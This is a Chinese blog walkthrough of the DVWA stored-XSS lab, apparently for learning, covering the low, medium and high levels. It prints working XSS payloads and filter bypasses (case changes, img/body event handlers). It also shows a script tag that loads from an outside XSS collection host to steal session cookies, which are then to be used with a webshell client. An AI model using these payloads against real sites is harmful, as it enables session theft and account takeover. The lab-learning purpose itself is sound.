DVWA-----------XSS (stored)

本文主要介绍了XSS(存储型)攻击,其长期存储于服务器端。分别阐述了low、medium、high三个级别的情况,low级别存在存储型xss,可获取cookie;medium级别可通过大小写绕过;high级别对message参数编码,name参数部分绕过方式失效,但可通过其他标签注入恶意js代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS(存储型)

长期存储于服务器端;

一、low级别

输入 1 提交
在这里插入图片描述
输入<script>alert('XSS')</script>
在这里插入图片描述
在这里插入图片描述
存在存储型的xss,所以每次打开都会弹框。
下面的都可以尝试
<body onload=alert('XSS1')>

<a href=http://192.168.37.128>登录</a>

`<img src=http://192.168.88.147/a.jpg οnerrοr=alert(‘XSS2’)>

`<script>window.location="http://www.baidu.com"</script> 重定向

获取cookie
注册一个xss接受平台 http://xss.fbisb.com/ 登录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
插入到里面</tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/GWz9></sCrIpT>
在这里插入图片描述
在这里插入图片描述
提交之后看都我们刚才创建的项目里面有了接受的cookie
在这里插入图片描述
然后把这个cookie用菜刀连接

二、medium级别

可以通过大小写绕过

其他语句和上面一样,script改大写就可以了。

三、high级别

查看源码
在这里插入图片描述
由于对message参数使用了htmlspecialchars函数进行编码,因此无法再通过message参数注入XSS代码;

但是对于name参数,High级别的代码使用preg_replace() 函数用于正则表达式的搜索和替换,将script前后相关的内容都替换为空,使得双写绕过、大小写混淆绕过不再有效;(正则表达式中i表示不区分大小写)

在High级别中,虽然在name参数中无法使用<script>标签注入XSS代码,但是可以通过img、body等标签事件或者iframe等标签的src注入恶意的js代码。

<body onload=alert('XSS1')>
<a href=http://192.168.37.128>登录</a>

<img  src=http://192.168.88.147/a.jpg onerror=alert('XSS2')>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值